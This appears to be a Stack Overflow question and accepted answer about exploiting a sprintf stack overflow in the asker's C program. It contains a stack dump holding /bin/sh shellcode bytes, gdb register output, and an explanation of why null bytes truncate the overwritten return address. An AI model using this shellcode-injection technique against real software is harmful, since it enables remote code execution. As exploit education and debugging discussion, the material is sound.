# Sprintf buffer-overflow - RIP register contains garbage data

Tags: c, printf, buffer-overflow, exploit

I try to exploit sprintf c function in my program which is used like this:

```
char line[512];
sprintf(line,"[%s]", UserCommand);
```

As you can see the line can be exploited and trigger something else. I found how to change rbp register but when it comes to RIP register, I can change it with **"0xFFFF7FFFEBFF8C10"** but I couldn't with  **"0x00007FFFEBFF8C10"**, the first 2 bytes "00 00" are replaced with 0x2D5D **( ])** which becomes **0x2D5D7FFFEBFF8C10**. This address cannot lead me to my buffer where my arbitrary code reside.

**The stack $rsp-100:**

`0x7fffebff8d94: 0xd23148f6      0x3bc08348      0xebe8050f      0x2fffffff
0x7fffebff8da4: 0x2f6e6962      0x4168732f      0x41414141      0x41414141
0x7fffebff8db4: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffebff8dc4: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffebff8dd4: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffebff8de4: 0xffffffff      0x41414141      0x0000155a      0x41414141
0x7fffebff8df4: 0x41414141      0xebff8c10      0x205d7fff      0x00000000
0x7fffebff8e04: 0x00000000      0x00bd5760      0x00000000      0x00000000`

**Backtrace in gdb:**

`0  0x00000000004093a0 in ProcessCmd (Ctx=40, Connect=27, Msg=0x7fffebff9e32 '\220' <repeats 200 times>..., Len=522)
    at /home/sam/srv/cmd/proc.c:305
1  0x205d7fffebff8c10 in ?? ()
2  0x0000000000000000 in ?? ()`

**Register:**

```
info r
rax            0xffffffff       4294967295
rbx            0x7fffebfff700   140737152808704
rcx            0x7ffff78cb1fd   140737346580989
rdx            0x919f40 9543488
rsi            0x0      0
rdi            0x919f40 9543488
rbp            0x4141414141414141       0x4141414141414141
rsp            0x7fffebff8df8   0x7fffebff8df8
r8             0x0      0
r9             0x29     41
r10            0x11     17
r11            0x0      0
r12            0x1      1
r13            0x7fffebfff9c0   140737152809408
r14            0x7fffebfff700   140737152808704
r15            0x0      0
rip            0x4093a0 0x4093a0 <ProcessCmd+407>
eflags         0x10202  [ IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
```

I want to know if this can be exploited or not ?

Is there any way to have a valid canonical address in the RIP register and remove the 2 bytes that making my address invalid ?

Thanks in advance

Comment: `sprintf(line, [%s], UserCommand)` -> `sprintf(line, "%s", UserCommand)`?  or `sprintf(line, "[%s]", UserCommand);`  (The original line does not compile.)

Comment: Yeah I'm sorry I didn't notice it. It's `sprintf(line, "[%s] ", UserCommand) There is a space in here : "[%s]space"`

Answer (score 1, accepted):

`sprintf(line,"[%s] ", UserCommand);`, `sprintf` will write `'['` to `line`, then your input which is `NULL terminated string`, then `']'`, `' '`, and last `NULL terminator`. Suppose you enter the string containing the shellcode and end with a return address. As you know that `%s` format speicfier will **STOP** writing this input when it finds a `NULL byte`.

Case 1:

```
Non_NULL_Shellcode = Your_shellcode
Return_address = 0xFFFF7FFFEBFF8C10
```

As you can see, no NULL byte in your input. So `sprintf` will write `'['` to `line`, then your input which is `NULL terminated string` containing shellcode and **complete** return address, then `']'`, `' '`, and last `NULL terminator`. It works well.

Case 2:

```
Non_NULL_Shellcode = Your_shellcode
Return_address = 0x00007FFFEBFF8C10
```

What is the difference? Yes, your return address containing two `NULL byte` at the end, which is interpreted by `sprintf` as a marker to **STOP** writing from your input. So this will happen. `sprintf` will write `'['` to `line`, then your input which is `NULL terminated string` containing shellcode and **incomplete** return address, then `']'`, `' '`, and last `NULL terminator`. `']' == 0x5d` and `' ' == 0x20` in ascii. When writing your return address (suppose in little endian) `sprintf` will write `0x10`, `0x8C`, `0xFF`, `0xEB`, `0xFF`, `0x7F` and continue write `0x5D`, `0x20`, and last `0x00` which is `NULL terminator`. So it explain why your address **0x00007FFFEBFF8C10** changes to **0x205D7FFFEBFF8C10**. **0x205D** is not garbage data it's your string. Hope it helpful :).